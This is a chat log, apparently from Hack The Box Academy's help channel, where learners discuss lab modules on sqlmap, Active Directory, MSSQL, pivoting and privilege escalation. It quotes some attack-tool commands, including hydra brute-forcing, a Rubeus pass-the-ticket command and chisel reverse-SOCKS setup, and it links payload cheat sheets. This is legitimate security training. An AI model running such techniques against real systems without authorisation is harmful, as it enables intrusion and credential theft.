#modules

The modules encourage you to use a bit of messing around with the information you're presented

alongside visiting the webpage of those cases gives you a basic hint of what to do

but you'd need to do some messing around in order to find where to start

while yes; sqlmap is an automation tool, to an extent, you still have to somewhat mess around in order to tell it where it start from -- then you can get it to do whatever you need to

Unfortunately this is the majority of the game we are in.

Banging your head against the wall a good portion of the time is part of it.

Learning how to drown gracefully is a big part of hacking.

Also, OffSec is a LOT worse with this kind of thing XD

If you pay for an annual subscription, you get the walkthroughs 😉

Also, can somebody give me a hint as to how to exfil the username portion from the nosql module on the CWEE?

If you can't do that, please tell me whether I'm supposed to be getting it from the /login or /forgot endpoint XD

I do pay for the annual subscription but walkthrough also does not go over the why, only this is how you do it. The course goes over the prefix and suffix usage, and even gives an example with the server side php code. But I'm struggling to see how I would have ever figured out the answer without having access to the php code. I'm not interested in just accepting the fact that I can run a script with provided parameters and get the answer, I want to know why I'm putting in the values and how to obtain them

ChatGPT...?

Or sqlmap -h

But honestly bro, you're probably never going to use SQLMap much anyway.

Not unless you are testing an app outside of production.

I'm not doing a pentest, I'm going through the course. This shouldn't be such a mystery

I feel you man, truly I do.

But let me tell ya, this is just the beginning.

It only gets worse.

A lot worse.

the walkthrough doesn't explain anything in any of the modules; it's why i suggest not using it

the walkthrough is assuming you read the content and have a grasp on any of the fundamentals related, and just move forward with that assumption

Exactly why I am here and not just moving on

So can you confirm that there is just no way that I would have been able to answer this without simply knowing common prefixes or did I actually miss something?

the module expects you to check the manpage, like every other person

How very helpful

if you're supposed to look at man pages or documentation then the expectation is that you do that

....except --prefix is literally not even on the manpage or -h

under Injection buddy

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to provided value

where exactly?

    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --skip=SKIP         Skip testing for given parameter(s)
    --skip-static       Skip testing parameters that not appear to be dynamic
    --param-exclude=..  Regexp to exclude parameters from testing (e.g. "ses")
    --param-filter=P..  Select testable parameter(s) by place (e.g. "POST")
    --dbms=DBMS         Force back-end DBMS to provided value
    --dbms-cred=DBMS..  DBMS authentication credentials (user:password)
    --os=OS             Force back-end DBMS operating system to provided value
    --invalid-bignum    Use big numbers for invalidating values
    --invalid-logical   Use logical operations for invalidating values
    --invalid-string    Use random strings for invalidating values
    --no-cast           Turn off payload casting mechanism
    --no-escape         Turn off string escaping mechanism
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data```

Well, that's not the output in Parrot OS

Also not exactly sure how that helps me in this situation

Ah, needs a -hh

awesome

read the docs properly next time

Ok, so again, how does this help me?

idk

Awesome, I revert to my initial comment "How very helpful"

get good

how do i leave a review on a module? cant find the option to

You're giving me such great advice I'll be there in no time. Thanks buddy

Maybe next time you could say check the advanced help menu instead of the manpage? Because the manpage still doesn't have the option

to be fair, they do go over prefix/suffix in the section, it's the first thing covered even if you didn't look at the advanced help menu. that said, to answer your question how would you know to use that prefix, selecting the correct prefix depends on the structure of the original sql query. it may need manual testing/guessing as to how it's structured or by experience or by guessing based off how you think the query is being sent.

you have to think of how the query is being sent and what it's looking up etc, which is why it's important to know what kind of db you're attacking, what kind of query it's making where you make your injection, etc.

Thanks, that's all I needed to know

Well, I guess I would also like to know if there is something I missed that would clue me in to what query is actually being run but from what has been said so far it sounds like that is not available

i did speak to that

inject basic characters manually and observe how the application reacts, error messages can reveal info, just simply by trying different prefixes, etc

Ok, so as asked above, is there some place to leave feedback? In my opinion this is more of a skills assessment question than part of the course leading up to the skills assessment. This section should go over the common prefixes and suffixes and should include the prefix needed to answer the question

it's covered in the previous module in the path, sql injection fundamentals

if you feel there are changes that should be made i think you can post it in #1234357888114364508

I'm doing the Basic Toolset path at the moment. SQL Injection Fundamentals is not part of the Basic Toolset

most likely because if you're using sqlmap they probably assume you have the fundamentals down, like how the queries are structured

that's just a guess though

That's fair enough, and would make sense. I think the Basic Toolset needs an update if that is the case though

Or maybe I didn't understand the purpose of the Basic Toolset when I selected it. I was under the impression it was the best place to start

Introduction to Bash Scripting / Working Components / Comparison Operators : for the last question, can someone please explain why $(var: -20) does not work to get the last 20 characters but tail -c 20 does? thanks

i don't that's valid syntax

it is

it gives the last 20, tail gives the last 19

tail -c simply uses an external command to do the same thing

yea which is why im confused

tail -c counts bytes

with the brackets?

still, why is tail -c 20 giving 19, where as var: -20 giving 20?

oh no im sorry typo in my message

had it right in the script tho haha

{var: -20}

because tail -c counts bytes

so? why is that changing output here

i get the first is a substring

but why does it matter if its counting bytes?

because characters are not always 1 byte each

ahh

so -c is grabbing the last 20 bytes

where as -20 is grabbing the last 20 characters

yes

does anyone know of a tool that can do attempt AXFR recursively ? Like if it initially found dev.domain.com via AXFR it will try AXFR with dev.domain.com to find internal.dev.domain.com and so on ? From what I searched online it seems there is only scripts

I wish I had an answer for you but the best answer would be bash scripting

yeah, seems like it, I am surprised though, as this seems like a common thing to try

my pawnbox is broken. cant spawn it. tried refreshing, clearing cache, changing browsers. Nothing worked. can i get some help?

are you using EU region?

nope

tried singapore us india

nothing spawns

i mean are you using HTB EU servers?

they have been having issues, if so, try US region

servers as in here right?

im getting an error message each time saying something went wrong

please try again later

It’s the one above it

i had to go to my vpn settings and change it

https://tenor.com/view/facepalm-really-stressed-mad-angry-gif-16109475

@tulip copper please don't post stuff that may spoil a skill assessment, also please don't post screen shots/commands of content above tier 0.

Where can I post my command and get help with why it doesnt work?

your command does work

I mean I didn't get the intended result I guess

i'll dm you

Is this the right place to question my doubts ?

This channel is for discussion of the various modules on HTB's Academy platform

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@harsh sandal (1201660294720667738) has been warned with a strike weight of 0.

no, this server isn't baout that

Oh i didn’t know

I’m looking for a sever for that

Anyone else gets broken targets? Frustrating when I spent over an hour on exercise and thinking I made a mistake, then suddenly target became unresponsive so I reset to another target. On another target the exercise worked right away and turns out I didn't even make a mistake.

This server is for discussion of HackTheBox's platforms, not doing illegal things.

Hello

I rarely encountered broken targets. Sure, sometimes it can happen, but it was rare for me. I found I was usually doing something wrong. Also, sometimes the exploits may not work just like in real life, until like a reboot happens or something.

Can you help me please

with what

HTB

Note added.

You can ask about modules from Academy here, or other things in other channels

Sure, it was the first time this kind of thing happened to me so I was wondering if it is a frequent problem. This time it was clearly a broken target since I did exactly the same thing once I've reset it and it worked perfectly! Just very frustrating because I spent some time and I thought I was doing something wrong

Well the thing I need a hacked is for a reason

Anyways, I've now managed to finish the XSS module which was a lot of fun. Anyone suggest what module to do next?

Someone I know had a video uploaded without there permission

That’s why

Doesn't matter, not the place for this. Contact the authorities if you think something illegal happened. No one is going to commit felonies for you like hacking youtube.

Not YouTube just a channel and that’s it I don’t want to hack the app

Contact youtube.

SuperNut what's your favorite module?

I liked Active Directory Certificate Services

That's the Windows, yeah? I noticed there are tons of AD modules, haven't done any yet.

yeah it's windows focused. i like a lot of moduloes though.

user behavior forensics was cool i thought

Sounds cool! I've really enjoyed the web app modules and learning tools like nmap and metasploit. I'm addicted to learning all from HTB 😄

Did you get a job in the field by learning from HTB?

no haha i'm old and got into IT a long time ago

Nice! I work in different field than IT but at least it's super fun hobby for me

Hi everyone,

is there a problem with HTB Academy VMs because I can't open a VM since yesterday

Yes, EU server right? I had the same problem. Change your VPN to US

What is the difference between the two learning progress figures mentioned above?

hi guys i am having problems with the end chapter exercise: when i go all down in the page instead to see the exercise i got diplayed the javascript code of the page

refresh the page?

Send the decimal representation of the subnet mask of the following CIDR: 10.200.20.0/27 what is the answer friend

Hello

https://www.pawprint.net/designresources/netmask-converter.php

convert the first 27 bits into 4 octets, then turn those into decimal

discord was created to ask and answer, all related questions in a connected room, not for showing off and being pretentious, don't be afraid, problems to answer or what we know, help people, to broaden your horizons and your intelligence, as well as your abilities, basically, discord is just a, connector, and has no right to, dictate, or judge someone, ok.... if you believe in AI or robots, and submit to them, BULLSHIT, bullshit....ok

ask

regarding your question. post it in #1024429874246590575

This is for modules related stuff only. Anything else will just be nuked

#1024429874246590575

Anyone got any ideas on wht a lab machine keeps disconneting?
Module: Active Directory Enumeration & Attacks - DC Sync Attacks
I had no issues with previous module last night,
I have tried changing VPN servers, Using host machine rather then my VM, rebooted VM,
I have occasionlly had it connect and then the box just freezes and kills the connection

https://status.hackthebox.com/

thanks @novel matrix I should have mentioned I'm using US servers because of that

then yeah I would recommend reaching out to us via the green chat bubble

I tried that and as I need content guidance it ends my conversation

oh they're back tomorrow

Anyone using Hydra, could you please guide.

hydra is not detecting correct password, it's my DB server. I just checked if hydra can detect that and it didn't.
MSSQL DB server running on Azure, uses SQL authentication
Tier: General Purpose - Serverless: Gen5

tsql -H myfreeserver-xx-redacted-xx.database.windows.net -p 1433 -U demouser -D myFreeDB
// This worked and I am able to login after entering password

At the same time I checked if
hydra -l "demouser" -p "password123" -s 1433 myfreeserver-xx-redacted-xx.database.windows.net mssql -m "DatabaseName=myFreeDB" -V
I can see it is trying the password, still the cred is not identified as correct one.
1 of 1 target completed, 0 valid password found.

Tried on Hydra version v9.2 and 9.5

Hello, i need some help with Pass the Ticket in Password Attacks module.
It says that this command is indeed performing Pass the Ticket:
c:\tools> Rubeus.exe asktgt /domain:<domain> /user:plaintext /rc4:<hash> /ptt
How is using the hash only gets us a full PtT atttack? if the hash was enough what's the plus in using the .kirbi file? is it something about how the /ptt and asktgt flag work?I see in the output of this command that it is importing the base64 ticket. So im a little bit confused.
I want to understand the attacks and cause really well.
Thanks in advance !

hello , there any one working on Exploiting Web Vulnerabilities in Thick-Client Applications ?

Hey, has somebody here done the ADCS attacks module? Stuck on the last question of the skill assessment

can anyone tell me how to install sqsh

it have to be compiled and i am confused

hey

why not try other tools.

nmap, medusa, maybe impacket

just use other tools for pwnbox/parrot

mssqlclient.py from impacket . i think some commands are not wrking in it

read the install file

pwnbox didnt have sqsh

it should work

could it depend on what authenticating system you use windows-auth or the other one

in attacking common services in section attacking sql databases i cannot use the creds i bruteforced for mssqlsvc the que Enumerate the "flagDB" database and submit a flag as your answer. and cannot do privesck . the account i loggedin is unusable i cannot even know all the databasess

Stealing hashes is the intended method

But everything is done within the sql prompts

yeah stole the hash and cracked it now what ???

Log in with it

thats the part i am unable to think of

Is the contents of the module "Introduction to Windows Command Line" up-to-date? I could not find the waldo.txt in cmd even after using the side-by-side solution. I found the file in a specific directory by using Windows Explorer. At that time the OS popped a message box saying "You don't currently have ..." and after clicking the ok button on it I could find the file in cmd with very same command which I used at first. I wonder if I forgot something in the module or previous ones, or the module is kind of outdated.

i cannot login with those creds

To the sql db?

Did you add -windows-auth?

yeah using mssqlclient

no let me try

Or maybe it's -local-auth

It's mentioned in the section

Run cmd/powershell as admin

it worked thanks @fathom pendant

https://tenor.com/view/tolarian-community-college-kyle-hill-magic-the-gathering-i-hate-your-deck-reading-the-card-gif-22381436

👍

Thank you for your advice. I made sure that I can run cmd as an admin and find the file. I will try to run anything as admin if possible.

Hey. Can anyone give the cue on attack path in DACLS II - skill assessment 3 question. I got NT hash of ||TANGUI|| user but I can't find any good ACL rights with this user

||checked gpo rights?||

Yes with impacket-dacledit it doesnt show anything. I checked GPO and also files on DC share

nothing to do with htb academy modules @finite abyss i suggest asking in another more relevant channel

I need to type that again

#homelab-sysadm ; #red-team

well this channel is for help with academy modules; not personal/self projects

did you figure this out? I to keep getting this error message even though i have the pass and user found in the smb client and according to write ups is correct

run as admin

You should have creds for a user that can create them and the user you have can link

Yes I did it for the 2 question. But the third one is to compromise DC

Good Afternoon guys someone has completed the module AI?

Thank you i tried that already but doubling back i got it

Check again who can link gpos where

Anyone from eu knows if us servers are fast enough

Or is it all buggy and laggy

22 and 23 maintenance i have now

In the sliver module, has anyone else come across repeated "rpc error: code = Unknown desc = implant timeout" errors?

its starting to be really frustrating, even when I set the timeout higher, it rarely works

How am I supposed to get wills password in Module "Credential Hunting in Linux", without the hint? Is it even possible?

ey guys i need help with this please. I'm stuck since 3 weeks

i don't know how to programm this

Good afternoon, I'm new, I wanted to know what module do you recommend to start?

Intro to academy after linux fundamentals after windows fundamentals

🙂

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I only have Windows, would I start with the basics of Windows?

if you can better linux fundamentals 🙂

okay, thank you very much

you're welcome

@unreal tartan Windows shouldn't stop you, you can either use a Virtual Machine running windows (most recommended), or use Windows Subsystem for Linux (WSL2) to run tools only available under Linux

I daily drive Windows, and ok rarely do bounty or modules, but am more than able to using WSL2. Reason for a Virtual Machine being the best option is that it keeps everything separate from your Host machine (Windows)

hey yall, quick question, on the htb academy lessons, do i need to use pwnboxos in order to complete them or can i just use my own stuff as I'd be more comfortable and it'd benefit me more to become more fluent in my own stuff

in shells and payloads, final challenge... the first host's hint provided username and password... How to obtain those username and password without the hint? is it brute?

Depends Mary I use pwnbox and my own box.

true but im also running on the free version of the academy and i only get one spawn

on CBBH modules most of the time I use my own box, but currently doing CPTS modules I keep using Pwnbox for faster result.

imma just play chicken with this train and if i need to move out of the way, then so be it

You can use your own box perfectly fine

killer 😄

The only differences are that the Pwnbox connects automatically, and that it includes all (or if not the majority of) the tooling used in the modules 🙂

I know it's wrong chat, but where can I find some materials how to make a htb machine to submit it? I mean to make a setup, virtual box iso, setup flags, etc

https://www.hackthebox.com/blog/make-vulnerable-machine

https://www.hackthebox.com/blog/building-your-first-htb-machine

They may not cover everything, but they contain good advice.

thx

np!

Guys I have done this in curl question and I am getting 50 as answer.

cat inl.txt | grep -o 'https://www.inlanefreight.com/' | wc -l

Now I need to get the path after the / and eleminate the duplicates, the answer is suppposed to be 33 or 34 but I dot know what exaactly to do like, I have tried uniq and sort -u but then it gets down to 1, can someone help what to search next

ey guys no one has completed it yes the module Ai

somepeople are suggesting to use regex in reddit but its in next module

combine the python3 code from the previous sections and you will be able to create the model anonmous7

isnt their any way to extract the answer with sort, grep

I went though their man pages and all but so fat havent been able to get ahead

but how bro

Yeeees thank you I got it!

can anyone please help with this, I have been stuck here for hours now and cant get anywhere

guys I'm going to dinner good night all

anyone know if theres a path or module setting for the ccna?

No one here can help you with that. This discord is about HackTheBox and their various platforms.

im asking about hack the box

i asked if there was a path or module to follow lol?

tried searching but to no avail

Ok, do you have an idea where someone could help me? The 'OpenSecurity' Server is just accessable with a invitation link.

I was replying to AbyssWatcher not you

No I don't

oooo ok sorry

yeah cause i see a few of the crest things, but none for the ccna

Ok, but thank you

I don't know of any HTB training on CCNA. They have a few basic networking modules, but CCNA focuses on Cisco equipment which I haven't seen on HTB at all. I haven't really seem them focus on any specific vendor equipment.

you can use your own system for 99.9999% of academy the 0.0001% is when it specifies pwnbox

run commands one at a time; before the wc -l command see what the output of your grep command is

yeah i have networking foundations, traffic analysis, pivoting tunneling and port on the list

i guess ill just do those ones next and follow the relative paths see where i end up

just trying to top bottom, so i can bottom up

Is there a way to get support from Hack the Box employees?
My problem is that the automated submission of ISC2 CPEs is not working despite having alle connected in the past and an active VIP subscription?

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support and https://www.hackthebox.com/contact-us

Cheers 👍

how to list tables in a database in mssql

the query they uused in section is not working

best to say which module/section you're on

attacking common services section attacking sql databases

i used sqlcmd and it worked great

i dont have windows

or should i spun a VM

i would recommend a VM that way you have access to windows and kali at the same time

or parrot or whatever

ok

i think sqsh also worked for me

there's another tool too it mentions from impacket you can try

sqsh is hard to install

i dont get it how to compile it

some environment variable . sybase something like this need to be exported

what OS are you using?

parrot

ahh. i use kali, i think it just comes built in with kali.

you could see if it's on the pwnbox

you can try the impacket tool too

no i checked it is not present in pwnbox

it is not working i mean the query to display all the tables is not working via mssqlclient.py

Parrot OS
Download libreadline7_7.0-5_amd64.deb
http://ftp.de.debian.org/debian/pool/main/r/readline/libreadline7_7.0-5_amd64.deb

Download sqsh_2.5.16.1-2_amd64.deb
http://ftp.ch.debian.org/debian/pool/main/s/sqsh/sqsh_2.5.16.1-2_amd64.deb

First install libreadline7 by double-clicking on the file.
Then install sqsh with a double-click.

Sick!

If you’ve finished the footprinting lab-medium then you can refer to how you solve the questions in that module

It’s almost the same as the mysql, you just need to change one word

check github for a clone

Hello guys!

I am doing the Attacking WPA/WPA2 Wi-Fi Networks - Skills Assessment
Getting some tls error certificates:

wlan1: STA ba:56:b5:74:a0:51 IEEE 802.1X: Supplicant used different EAP type: 13 (TLS)
wlan1: STA ba:56:b5:74:a0:51 IEEE 802.11: deauthenticated due to local deauth request

I patched the eap_server_tls.c file to accept the certificate, but even after that I am still getting the certificate error from the client.
Someone could help?

hi all, quick one Linux Priv Esc - Escaping Restricted Shells, I have the flag but have been playing around with different ways the restriction of '/' makes it harder but I just want clarification is there only one intended method as the question says using 'different approaches' many thanks

Hello guys

Hello

hello, did you need something

Yo

Yo that's my last challenge on this module, but this thing is just not working.
Even after patching the file

PSWA in the Windows Lateral Movement Skills Assessment is returning ERR_SSL_KEY_USAGE_INCOMPATIBLE when I attempt to access it from Chrome on the machine I'm running Parrot on bare metal from. Any ideas?

Never mind, works fine from Firefox.

Hello, I'm not sure if it's the right channel, but let me know if not so I can delete my message.
Are there any course on HTB Academy related to cloud (either offensive or defensive modules) ?

no there aren't

Thanks. Do you recommend a platform to learn about that topic ?

i haven't checked it out too much myself, but i hear pwnedlabs.io is popular

Thanks !

I think it has Azure, AWS, and Google Cloud Red teaming stuff

which sounds very useful

yeah i think some blue stuff too

ya they just gotta add Oracle and IBM red teaming

between that there's most of the cloud services among Silicon Valley companies and government organizations

that would get you red teaming skills for more than 90% of Silicon Valley, more than 90% of government organizations, and more than 90% of fortune 500 companies

and the hacking skills would be usable with all of that

wow lmao

lolll

im not entirely sure if you guys had the same results but

some wrong with that target url perhaps

Team, I was working on Pentesting > Information Gathering > Virtual hosts

Here, the solution that has been provided is not working.
I tried all possible methods but still it remains stuck.
Can someone help here from #modules team ?

What exactly are you having issues with?

I am performing vhost enumeration and with that the wordlist mentioned is exactly used but I am not getting the expected output to answer questions.

I have copy paste the exact command by changing the IP of my target machine.

Did you change the port?

Change the 81 from the command to the targets port and it should work

Certainly. I just figured out that the dns resolution part, I messed up with wrong IP.

Sorry for creating trouble. Thanks @signal rain

No trouble was caused, I had issues when I did that module as well. Good luck boss

Thankx

hey has anyone done the token defensive module on academy

https://dontasktoask.com

Im just asking if anyone did it and would like to share what you thought about it

On the medium assessment for the Attacking Common Services module, I tried scanning common ports 1-1028 and found some stuff open. That was ok but nothing that was open was usable to access the server like the lab is telling me to do. I tried scanning for all ports -p- but it didnt work either because my pings were being blocked. Then I tried again but with Pn and it really didn't work at all because this was the output:

Nmap scan report for 10.129.128.59
Host is up (3.2s latency).
All 65535 scanned ports on 10.129.128.59 are in ignored states.
Not shown: 63203 filtered tcp ports (no-response), 2332 filtered tcp ports (host-unreach)

Nmap done: 1 IP address (1 host up) scanned in 2384.96 seconds```

So now I'm trying an idle scan which probably won't work but I don't know what else to try.

Should I just start a new target?

and try the sudo nmap -Pn -p- ip-address again?

I also tried a connect scan because idle scan stopped vpn from working like I couldn't make it work

I tried using google as the zombie

but I felt like that was going in a bad direction so I switched from -sI to -sT

gonna try it again if this scan in different vpn config file won't work

@quasi wave if you are given a port number, stick to the port number

Oh, VPN

NVM

My bad, thought it was a docker instance 🙂

no

Yeah, I see that now, tired eyes.

I found when scanning common ports that DNS, SMTP, and POP3 are open a while ago. But hydra, medusa, and smtp-user-enum aren't getting anything. Port 22 is also open but I can't get a specific SSH username to crack the password of.

I even tried using hydra with same password and different screennames to try and enumerate SSH usernames

and none of this will work so I need to try every possible port

Nmap scan report for 10.129.128.59
Host is up.
Skipping host 10.129.128.59 due to host timeout
Nmap done: 1 IP address (1 host up) scanned in 900.40 seconds
                                                                  ```

so -sT is not working either

can someone help me out with this?

I literally tried everything I even tried attacking FTP which was the only other thing that I think might have been open.

Are the ports you found earlier still open?

I think so ya

I scanned common ports multiple times

Let's go to DM.. I don't do this often.. but I'll see if I can nudge

Introduction to Malware Analysis - Debugging

Following the module and replicating it step by step. However, each time I run the binary in x64dbg, sandbox detection box always pops. I've changed all addresses. Anyone avail for DM?

go for it

@naive sage so yea...I get back my b64 string after decoding..and..well..that's it

You got the b64? decode it to clear-text, you got the answer.

I did..but it was a previous answer

:/ apparently @naive sage it was a typo in the 1337 so a c/p did what typing it didn't...who knows..

🤣

You got the answer tho?

yea

go figure... 1337 pr0b13m5

yeah copy/pasting is almost always gonna be superior lol

sometimes it adds spaces that I have to remove to condense the htb{} though

it'll be like htb {c oddddddddde }

that's a skill issue

you can just condense it down with some simple functions or just not have skill issue 🙏

nah, just gotta delete the spaces lol

no need to code for that

i've not had any issues though with spaces in the middle of the code

might be c/p between vm and metal

unless you're referring to where it crafts the flag with 'str'+'str'+'str'

i've not had that issue

like...ever

hey guys how long do i gotta wait for that pin to crack g

Login Brute Forcing

never mindddddd

got it

Hello everyone

I face an error with wordpress module in skill assessment

I can't access the target it's just give me an IP after fire up the machine and I scan it with wpscan and till me this site does not run WordPress and I try to access blog sub domain but I can't due to DNS problem so how can I fix this problem?

Take a look at the source code of the website.
If DNS is a problem, then a known file on the PC could help you

Thanks I just add the IP and the subdomain in to my hosts file , the problem is solved

that why it could be good to start with the fundamental courses. Altough sometimes the wording of the supposed answers are abit anoying

There are several modules, File Upload Attacks & File Inclusion, that do not show parts of code. I tried several browsers with extensions and not and reloaded the page with CTRL+SHIFT+R

Hello, im stuck on : https://academy.hackthebox.com/module/51/section/1592 "Environment Enumeration",
I successfully got a root shell but when I enter the flag, its not the correct answer, as root, I perform the command : find / -type f -name "flag.txt" but I see only the wrong flag on the machine

Make sure there are no spaces at front/back

Already check that Still not working

the flag is not in a flag.txt file, re-read the question. You may be jumping steps too, I don't remember but I'm not sure you need to actually escalate to root for the answer

Oh okey

hey guys, im in the Pivoting, Tunneling, and Port Forwarding module. Im in the RDP and SOCKS Tunneling with SocksOverRDP section. I have RDP'd into the second machine but seem to be having an issue running the socksoverrdp-server.exe, as i try to run it and nothing happens. Any thoughts as to why this is happening?

Hello guys. Can you please give me good Cheat Sheets for web exploitation topics? such as SQLi, XSS, LFI, etc.. Every cheat sheet either large and full of not needed info or only commands/payloads

XSS -> https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

SQLi -> https://portswigger.net/web-security/sql-injection/cheat-sheet

What designation do we typically give a report when it is first delivered to a client for a chance to review and comment? (One word) can anyone gave me the answer

the simplest answer is the right one buddy

Anytime to do with MySQL 5.7.23

can you plz tell me the answer

Which module is this question from?

penetration testing prosess

guys hello how correct syntax in finding details about localgroup in windows should be for example backup operators?

for the command net localgroup backup operators it gives me mistake but for command net localgroup administrators gives information I seem I am doing wront syntax?!

Are you wrapping "Backup Operators" in quotes?

no and I should?

oh it's Penetration Testing Process

For any of them that are more than one word with a space between.

Thank you it worked))))

Maybe this one?
Introduction to Penetration Testing

no

What is the name of the module and what is the name of the section?

Penetration Testing Process ,Post-Engagement(section)

Read the chapter „Deliverable Acceptance“ again

thanks @acoustic owl

What is the name of the security standard for credit card payments that a company must adhere to? (Answer Format: acronym) hey @acoustic owl can you gave me the answer

Read the module again. The answer is in the text

is it PCI DSS

Hi Guys again why accesschk.exe is not working in cmd?

as a command?

usally helps if you provide some output

is not it prohibited by rules here?

well if it is just error msg?

not it is not an error message command provided in module is not working on target machine.... and I am interested why?!

Is Hack The Box openvpn down right now?

I can't get on Enterprise, Labs or on Academy

for me works

I am going through the Windows Privelege Escalation Module

well how is it not working if it dosent give error message?

idk, it's not even accepting on my VM or host machine

Anyone familiar with this module ' window privillage escalation ' .. i have stuck for 3 days.. hmmmm

hint: Look up default privileges for windows

and select the one that isn't a default account priv

means by using whoami /all cmd?

hello guys ı need help about web enumeration I dont understend whats is the answer becouse ı cant fınd robots.txt file can you guys help me about ıt

anyone help me.. Please

Open an elevated PS session then run your command. I'm pretty sure I mentioned this the other day.

elevated PS session?

You can DM if you don't understand what I mean.

I already use Powershell as admin also cmd.

any one help me to?

strange, even with the client on my host and a new image of vmware it still isn't working

The only thing I haven't done at this point is pick a different server

have you looked at the standard path for it?

yea ı do every think probably ı mıss somethıng

but ıdk what ıt ıs

Good morning everybody hope you’re doing great I need some help getting root access to the Ubuntu 20.04.1 on penetration tester pathway privilege escalation module here is some information has anyone completed this module? I need some help with it please what kind of exploit I should use I have tried. Dirtycow cowroot but not compatible with the target any idea might help

Remember if you've identified new subdomains to start your enumeration process over again for them.

Hi there, looking for help with "Working with IDS/IPS" module, i'm stuck at "Suricata Rule Development Part 2 (Encrypted Traffic)" section.

The question : There is a file named trickbot.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to a certain variation of the Trickbot malware. Enter the precise string that should be specified in the content keyword of the rule with sid 100299 within the local.rules file so that an alert is triggered as your answer.

I started by looking at the local.rules file and "Content" is empty there, so from what I understood I should look trought trickbot.pcap, my problem is that I'm quite lost on how should I do this? I don't have tshark available

Is anyone else having issues connecting to their Open VPN on Hack The Box?

ı scan every thınk there have multiple ıp servers ports etc but ı dıdnt under stand wıch one ı have to try for robots.txt for private

use the strings tool

Check the local.rules file to confirm that the rule with sid: 100299 is missing the content field. Use: cat /etc/suricata/rules/local.rules | grep 100299
Open the trickbot.pcap file Using Tcpdump

tcpdump -nnr /home/htb-student/pcaps/trickbot.pcap | less

im connected. had to redownload the file

So weird, I redownloaded the file as well, and switched the server

guys do you know to ıssues ın my problem can you help me

It wasn't a file issue but I figured it out

It was a problem on HackTheBoxes side

Navigating to http://10.10.10.121/private in a browser reveals a HTB admin login page.

ı do thıs but not workıng

Its So Embarresing

please help...

if you want to increase your chances of getting assistance, put the module name and section name that you're working on as well as what you have tried

I tried to use both tcpdump and strings as I got suggested but yeah still stuck, I'm expeting to find an hex string but I'm probably looking for the wrong thing here

nevermind... I just have reading issues.

I completely missed the point of ja3, I solved it now

complicated ahhhh

there is no walkthrough on window privillage escalation module.. Im starting to give up and stop the enrolled soon.. .

😂

anyone managed to solve the T2 Server Side: Skills Assessment?
I solved it but i'm looking for the intendend solution

Module: Footprinting Lab - Hard

I was doing this lab so i tried udp ports, but didnt give me anything. Then i ran it again and got a snmp port. After that i tried connecting but it was showing timeout. Then i bruteforce community strings didnt return. Then i did it again and i returned backup. then i tried to snmpwalk it and it says:
Timeout: No Response from 10.129.15.81

So the concerning thing is that even if i tried from PWNBOX, same false positives are happening. Any expereince with this problem what should i do. Im scared that it might happen again in future and potentially waste hours and may happen even in exam so wat should i do?

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer.

I am stuck, help.

I understand that I need grep -o combined with sort -u to uniquely list the paths, wc -l for the count but I am struggling with regex and striping etc

Gimmee a sec

Okay you’re on the right track you’ll need to use sed to validate the regex correctly

https://regex101.com/

Should help you out

altho you are not supposed to grep for that
you need to chain the tools you have learned so far

Hello am trying to complete this task : Transfer Julio's ccache file from LINUX01 to your attack host. Follow the example to use chisel and proxychains to connect via evil-winrm from your attack host to MS01 and DC01. Mark DONE when finished. but am stuck at connecting back to DC01

I have manged to transfer the ccache file require for julio and here is the command I used for setting up chisel server:

sudo ./chisel server --socks5 --reverse
2025/02/24 19:29:39 server: Reverse tunnelling enabled
2025/02/24 19:29:39 server: Fingerprint h8S0dGz7u8bocnrew+nEOQky8Qupv3illaJTM3f+Z9g=
2025/02/24 19:29:39 server: Listening on http://0.0.0.0:8080
2025/02/24 19:30:14 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

I am on file system module, i followed the content and i can not figure out the correct answer, my answer is "NT AUTHORITY\SYSTEM", any advice
the Question is What system user has full control over the c:\users directory?
I run the following command
icacls c:\users
the output was as follows:
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)

Anyone finished intro to deserialization skill assessment 2. I'm struggling to get RCE. I can only get 500 error or redirect to local host. I think I'm unable to bypass a filter.

here is my krb5 config for reference:

cat /etc/krb5.conf 
[libdefaults]
    default_realm = INLANEFREIGHT.HTB

[realms]
    INLANEFREIGHT.HTB = {
        kdc = dc01.inlanefreight.htb

look at where proxychains is trying to route to, it's routing to a public router -- not to the DC; you need to add all subnames of DC01 to your /etc/hosts file

Hello, maybe someone could help me with this question?

Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file.

also the question states using evil-winrm to connect

not psexec

also: module is above t0 so avoid spoiling

i'm assuming for proxychains you used ssh -D to connect to the initial host

or some other pivot method

ligolo-ng avoids the whole proxychains nonsense

@novel parrot If you assign several IPs to a domain, this is guaranteed to cause problems

evil-winrm doesn't work for me:

try cleaning up your hosts file first only leaving the lines relevant to your current task

That's kind of AWKward

...I'll see myself out 🚪 🚶

https://tenor.com/view/boooooo-this-guy-stinks-serious-spongebob-squarepants-gif-11981386

@signal hound pass attacks is above t0 avoid spoiling things like usernames and files you need to dig for

that file is the last step

How am i supposed to get it tho
I tried every way i know

you should be able to via smb;

i suggest restarting the machine, waiting a min, trying again

Ok thanks

sorry if this is a silly question, but what does a flag look like, I'm at this question and using tcpdump to intercept data while i used nc on each port, but i'm not really sure what i'm looking for

unless i'm in the wrong spot, this is what my output is looking like, so i could just be doing it wrong lol

why not use nmap to get ports

also module and section name is SUPER helpful

you're likely overthinking the problem

module and section name

that's helpful to have others help you

Network Enumeration with Nmap | Service Enumeration

you're overthinking the problem

silly thing @novel parrot try with sudo

